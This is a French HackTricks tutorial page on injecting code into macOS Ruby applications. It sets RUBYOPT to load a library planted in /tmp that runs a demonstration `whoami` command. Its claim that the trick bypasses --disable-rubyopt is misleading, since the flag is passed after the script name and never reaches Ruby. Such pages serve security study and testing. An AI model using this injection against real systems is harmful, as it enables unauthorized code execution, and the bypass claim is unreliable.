hacktricks/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ruby-applications-injection.md

3.3 KiB

Injection dans les applications Ruby macOS

Apprenez le piratage AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!

Autres moyens de soutenir HackTricks :

RUBYOPT

En utilisant cette variable d'environnement, il est possible d'ajouter de nouveaux paramètres à ruby chaque fois qu'il est exécuté. Bien que le paramètre -e ne puisse pas être utilisé pour spécifier du code ruby à exécuter, il est possible d'utiliser les paramètres -I et -r pour ajouter un nouveau dossier au chemin de chargement des bibliothèques et ensuite spécifier une bibliothèque à charger.

Créez la bibliothèque inject.rb dans /tmp :

{% code title="inject.rb" %}

puts `whoami`
{% endcode %}

Créez n'importe où un script ruby comme :

{% code title="hello.rb" %}
puts 'Hello, World!'
Puis faites charger un script ruby arbitraire avec :
RUBYOPT="-I/tmp -rinject" ruby hello.rb

Fait amusant, cela fonctionne même avec le paramètre --disable-rubyopt :

RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt
Apprenez le piratage AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!

Autres moyens de soutenir HackTricks :